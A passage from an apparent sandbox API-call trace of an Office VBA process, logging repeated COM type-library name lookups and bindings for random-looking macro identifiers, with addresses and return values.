pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.006] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.006] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.006] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KAQ1__oA", lHashVal=0x1094da, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.006] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61d3e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KAQ1__oA") returned 9 [0069.007] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KAQ1__oA", lHashVal=0x1094da, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.007] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.007] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61d3e | out: _Dst=0x67c2d40) returned 0x0 [0069.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KAQ1__oA") returned 0x106c63 [0069.007] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_KAQ1__oA" | out: _Dst="_B_var_KAQ1__oA") returned 0x0 [0069.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_KAQ1__oA") returned 16 [0069.007] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.007] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KAQ1__oA", lHashVal=0x106c63, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.007] IUnknown:Release (This=0x665ba50) returned 0xd [0069.007] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.007] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KAQ1__oA", lHashVal=0x106c63, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.007] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.007] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.007] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KAQ1__oA", lHashVal=0x106c63, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.007] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.007] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.007] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KAQ1__oA", lHashVal=0x106c63, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.007] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.007] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.007] IUnknown:Release (This=0x665ba50) returned 0xd [0069.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1094e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_KAQ1__oA") returned 16 [0069.007] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KAQ1__oA", lHashVal=0x106c63, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x5f003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x5f003100000000, pDummy=0x0) returned 0x0 [0069.007] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61d3e | out: _Dst=0x144ec0) returned 0x0 [0069.007] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lDAA4ZAX", lHashVal=0x10afff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61dc2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lDAA4ZAX") returned 9 [0069.008] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lDAA4ZAX", lHashVal=0x10afff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61dc2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lDAA4ZAX") returned 9 [0069.008] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lDAA4ZAX", lHashVal=0x10afff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lDAA4ZAX") returned 0x10afff [0069.008] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="lDAA4ZAX" | out: _Dst="lDAA4ZAX") returned 0x0 [0069.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="lDAA4ZAX") returned 9 [0069.008] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.008] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lDAA4ZAX", lHashVal=0x10afff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.008] IUnknown:Release (This=0x665ba50) returned 0xd [0069.008] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.008] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lDAA4ZAX", lHashVal=0x10afff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.008] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.008] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.008] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lDAA4ZAX", lHashVal=0x10afff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.008] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.008] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.008] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lDAA4ZAX", lHashVal=0x10afff, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.008] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61dc2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lDAA4ZAX") returned 9 [0069.008] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lDAA4ZAX", lHashVal=0x10afff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.008] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.008] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61dc2 | out: _Dst=0x67c2d40) returned 0x0 [0069.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lDAA4ZAX") returned 0x108788 [0069.009] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_lDAA4ZAX" | out: _Dst="_B_var_lDAA4ZAX") returned 0x0 [0069.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_lDAA4ZAX") returned 16 [0069.009] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.009] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lDAA4ZAX", lHashVal=0x108788, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.009] IUnknown:Release (This=0x665ba50) returned 0xd [0069.009] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.009] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lDAA4ZAX", lHashVal=0x108788, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.009] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.009] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.009] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lDAA4ZAX", lHashVal=0x108788, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.009] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.009] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.009] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lDAA4ZAX", lHashVal=0x108788, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.009] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.009] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.009] IUnknown:Release (This=0x665ba50) returned 0xd [0069.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1097e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_lDAA4ZAX") returned 16 [0069.009] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lDAA4ZAX", lHashVal=0x108788, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0069.009] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61dc2 | out: _Dst=0x144ec0) returned 0x0 [0069.009] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cAAAA_1", lHashVal=0x1016fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61dee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cAAAA_1") returned 8 [0069.009] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cAAAA_1", lHashVal=0x1016fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61dee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cAAAA_1") returned 8 [0069.009] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cAAAA_1", lHashVal=0x1016fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cAAAA_1") returned 0x1016fa [0069.010] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="cAAAA_1" | out: _Dst="cAAAA_1") returned 0x0 [0069.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="cAAAA_1") returned 8 [0069.010] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.010] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cAAAA_1", lHashVal=0x1016fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.010] IUnknown:Release (This=0x665ba50) returned 0xd [0069.010] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.010] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cAAAA_1", lHashVal=0x1016fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.010] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.010] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.010] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cAAAA_1", lHashVal=0x1016fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.010] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.010] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.010] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cAAAA_1", lHashVal=0x1016fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.010] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61dee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cAAAA_1") returned 8 [0069.010] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cAAAA_1", lHashVal=0x1016fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.010] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.010] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61dee | out: _Dst=0x67c2d40) returned 0x0 [0069.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cAAAA_1") returned 0x100afd [0069.010] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_cAAAA_1" | out: _Dst="_B_var_cAAAA_1") returned 0x0 [0069.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_cAAAA_1") returned 15 [0069.010] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.010] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cAAAA_1", lHashVal=0x100afd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.010] IUnknown:Release (This=0x665ba50) returned 0xd [0069.010] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.010] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cAAAA_1", lHashVal=0x100afd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.010] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.011] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.011] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cAAAA_1", lHashVal=0x100afd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.011] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.011] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.011] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cAAAA_1", lHashVal=0x100afd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.011] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.011] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.011] IUnknown:Release (This=0x665ba50) returned 0xd [0069.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b109ae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_cAAAA_1") returned 15 [0069.011] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cAAAA_1", lHashVal=0x100afd, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.011] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61dee | out: _Dst=0x144ec0) returned 0x0 [0069.011] ITypeComp:RemoteBind (in: This=0x665ba60, szName="b1AcBxXX", lHashVal=0x100091, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e16, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="b1AcBxXX") returned 9 [0069.011] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="b1AcBxXX", lHashVal=0x100091, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e16, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="b1AcBxXX") returned 9 [0069.011] ITypeComp:RemoteBind (in: This=0x665bd30, szName="b1AcBxXX", lHashVal=0x100091, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b1AcBxXX") returned 0x100091 [0069.011] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="b1AcBxXX" | out: _Dst="b1AcBxXX") returned 0x0 [0069.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="b1AcBxXX") returned 9 [0069.011] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.011] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="b1AcBxXX", lHashVal=0x100091, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.011] IUnknown:Release (This=0x665ba50) returned 0xd [0069.011] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.011] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="b1AcBxXX", lHashVal=0x100091, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.012] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.012] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.012] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="b1AcBxXX", lHashVal=0x100091, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.012] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.012] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.012] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="b1AcBxXX", lHashVal=0x100091, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.012] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e16, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="b1AcBxXX") returned 9 [0069.012] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="b1AcBxXX", lHashVal=0x100091, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.012] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.012] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61e16 | out: _Dst=0x67c2d40) returned 0x0 [0069.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_b1AcBxXX") returned 0x10d859 [0069.012] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_b1AcBxXX" | out: _Dst="_B_var_b1AcBxXX") returned 0x0 [0069.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_b1AcBxXX") returned 16 [0069.012] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.012] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_b1AcBxXX", lHashVal=0x10d859, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.012] IUnknown:Release (This=0x665ba50) returned 0xd [0069.012] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.012] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_b1AcBxXX", lHashVal=0x10d859, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.012] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.012] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.012] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_b1AcBxXX", lHashVal=0x10d859, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.012] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.012] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.012] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_b1AcBxXX", lHashVal=0x10d859, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.012] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.012] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.012] IUnknown:Release (This=0x665ba50) returned 0xd [0069.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b109de, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_b1AcBxXX") returned 16 [0069.013] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_b1AcBxXX", lHashVal=0x10d859, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x42006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x42006300000000, pDummy=0x0) returned 0x0 [0069.013] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61e16 | out: _Dst=0x144ec0) returned 0x0 [0069.013] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KXQAAoXx", lHashVal=0x10c8c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e42, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KXQAAoXx") returned 9 [0069.013] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KXQAAoXx", lHashVal=0x10c8c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e42, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: 